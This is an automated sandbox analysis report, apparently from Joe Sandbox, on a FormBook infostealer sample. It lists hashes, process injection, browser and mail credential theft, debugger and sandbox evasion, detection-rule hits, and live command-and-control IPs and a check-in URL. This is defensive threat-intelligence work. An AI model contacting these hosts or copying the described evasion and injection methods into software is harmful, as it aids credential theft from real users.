Edit tour

Windows Analysis Report
A2028041200SD.exe

Overview

General Information

Sample name:	A2028041200SD.exe
Analysis ID:	1564960
MD5:	2902d8f9bc667f82a0bb441f3c4dae1f
SHA1:	d4d9ed800e1917569e06b08665e5e19707f3412f
SHA256:	693424f033f85a79af47963f829e65b5315faad47cd4a82d3a0a76c6962c9968
Tags:	exeuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

A2028041200SD.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 2902D8F9BC667F82A0BB441F3C4DAE1F)

svchost.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ohrkzzHWPesnQB.exe (PID: 3640 cmdline: "C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

winrs.exe (PID: 5728 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)

ohrkzzHWPesnQB.exe (PID: 3948 cmdline: "C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1272 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 4416, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 6172, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 4416, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 6172, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T03:52:57.314704+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.40.167	80	TCP
2024-11-29T03:53:23.339349+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49785	23.167.152.41	80	TCP
2024-11-29T03:53:38.402924+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49819	66.29.132.194	80	TCP
2024-11-29T03:53:54.655873+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49857	202.92.5.23	80	TCP
2024-11-29T03:54:09.787502+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49896	194.195.220.41	80	TCP
2024-11-29T03:54:25.829319+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49935	103.230.159.86	80	TCP
2024-11-29T03:54:40.739833+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49973	104.21.31.242	80	TCP
2024-11-29T03:54:55.941988+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50006	118.107.250.103	80	TCP
2024-11-29T03:55:10.922948+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50010	209.74.77.109	80	TCP
2024-11-29T03:55:25.992151+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50014	172.67.169.6	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T03:52:57.314704+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49717	104.21.40.167	80	TCP
2024-11-29T03:53:23.339349+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49785	23.167.152.41	80	TCP
2024-11-29T03:53:38.402924+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49819	66.29.132.194	80	TCP
2024-11-29T03:53:54.655873+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49857	202.92.5.23	80	TCP
2024-11-29T03:54:09.787502+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49896	194.195.220.41	80	TCP
2024-11-29T03:54:25.829319+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49935	103.230.159.86	80	TCP
2024-11-29T03:54:40.739833+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49973	104.21.31.242	80	TCP
2024-11-29T03:54:55.941988+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50006	118.107.250.103	80	TCP
2024-11-29T03:55:10.922948+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50010	209.74.77.109	80	TCP
2024-11-29T03:55:25.992151+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50014	172.67.169.6	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T03:52:26.370008+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50017	194.245.148.189	80	TCP
2024-11-29T03:53:15.394447+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49762	23.167.152.41	80	TCP
2024-11-29T03:53:18.095701+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49768	23.167.152.41	80	TCP
2024-11-29T03:53:20.668093+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49775	23.167.152.41	80	TCP
2024-11-29T03:53:30.444313+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49802	66.29.132.194	80	TCP
2024-11-29T03:53:33.050179+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49808	66.29.132.194	80	TCP
2024-11-29T03:53:35.828804+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49814	66.29.132.194	80	TCP
2024-11-29T03:53:46.604407+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49838	202.92.5.23	80	TCP
2024-11-29T03:53:49.292024+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49844	202.92.5.23	80	TCP
2024-11-29T03:53:51.947985+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49850	202.92.5.23	80	TCP
2024-11-29T03:54:01.576700+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49877	194.195.220.41	80	TCP
2024-11-29T03:54:04.290581+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49884	194.195.220.41	80	TCP
2024-11-29T03:54:07.132233+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49890	194.195.220.41	80	TCP
2024-11-29T03:54:17.744197+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49916	103.230.159.86	80	TCP
2024-11-29T03:54:20.416077+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49922	103.230.159.86	80	TCP
2024-11-29T03:54:23.087700+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49928	103.230.159.86	80	TCP
2024-11-29T03:54:32.687356+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49953	104.21.31.242	80	TCP
2024-11-29T03:54:35.498355+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49961	104.21.31.242	80	TCP
2024-11-29T03:54:38.048936+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49967	104.21.31.242	80	TCP
2024-11-29T03:54:47.930840+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49988	118.107.250.103	80	TCP
2024-11-29T03:54:50.571221+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	118.107.250.103	80	TCP
2024-11-29T03:54:53.243274+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	118.107.250.103	80	TCP
2024-11-29T03:55:02.908327+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	209.74.77.109	80	TCP
2024-11-29T03:55:05.605786+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50008	209.74.77.109	80	TCP
2024-11-29T03:55:08.216619+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	209.74.77.109	80	TCP
2024-11-29T03:55:17.864027+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	172.67.169.6	80	TCP
2024-11-29T03:55:20.526834+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50012	172.67.169.6	80	TCP
2024-11-29T03:55:23.160011+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50013	172.67.169.6	80	TCP
2024-11-29T03:55:33.056754+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	194.245.148.189	80	TCP
2024-11-29T03:55:35.717869+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50016	194.245.148.189	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.orbitoasis.online/k6yn/	Avira URL Cloud: Label: malware
Source: http://www.orbitoasis.online/k6yn/?QtKtUpvP=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6Q7f6sEw+fEYYIvxzrJruwJPw/20oMsQ+GrA/2J3jy9WwQ==&tz=vf30S8fHB	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: A2028041200SD.exe	ReversingLabs: Detection: 34%
Source: A2028041200SD.exe	Virustotal: Detection: 26%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: A2028041200SD.exe

Joe Sandbox ML: detected

Source: A2028041200SD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: winrs.pdbGCTL source: svchost.exe, 00000002.00000003.2099496166.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099307666.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099202207.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000002.3877672461.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ohrkzzHWPesnQB.exe, 00000003.00000002.3877856897.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3877194283.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.2031620680.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.2032085870.0000000003650000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035223587.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033687417.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.000000000359E000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2134157557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2131648548.0000000003179000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.000000000367E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.2031620680.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.2032085870.0000000003650000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2035223587.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033687417.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.000000000359E000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000004.00000003.2134157557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2131648548.0000000003179000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.000000000367E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: winrs.pdb source: svchost.exe, 00000002.00000003.2099496166.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099307666.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099202207.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000002.3877672461.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01026CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_01026CA9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_010260DD
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_010263F9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0102EB60
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102F56F FindFirstFileW,FindClose,	0_2_0102F56F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0102F5FA
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01031B2F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01031C8A
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_01031F94
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C5C3A0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02C5C3A0

Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4x nop then xor eax, eax		4_2_02C49F40
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_032704CE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49717 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49717 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49844 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49802 -> 66.29.132.194:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49785 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49785 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49775 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49877 -> 194.195.220.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49884 -> 194.195.220.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49814 -> 66.29.132.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49808 -> 66.29.132.194:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49896 -> 194.195.220.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49762 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49850 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49896 -> 194.195.220.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49890 -> 194.195.220.41:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49819 -> 66.29.132.194:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49819 -> 66.29.132.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49768 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49916 -> 103.230.159.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49838 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49961 -> 104.21.31.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49953 -> 104.21.31.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49967 -> 104.21.31.242:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49857 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49857 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 172.67.169.6:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 172.67.169.6:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.67.169.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 194.245.148.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.67.169.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 172.67.169.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49928 -> 103.230.159.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49922 -> 103.230.159.86:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49973 -> 104.21.31.242:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49973 -> 104.21.31.242:80
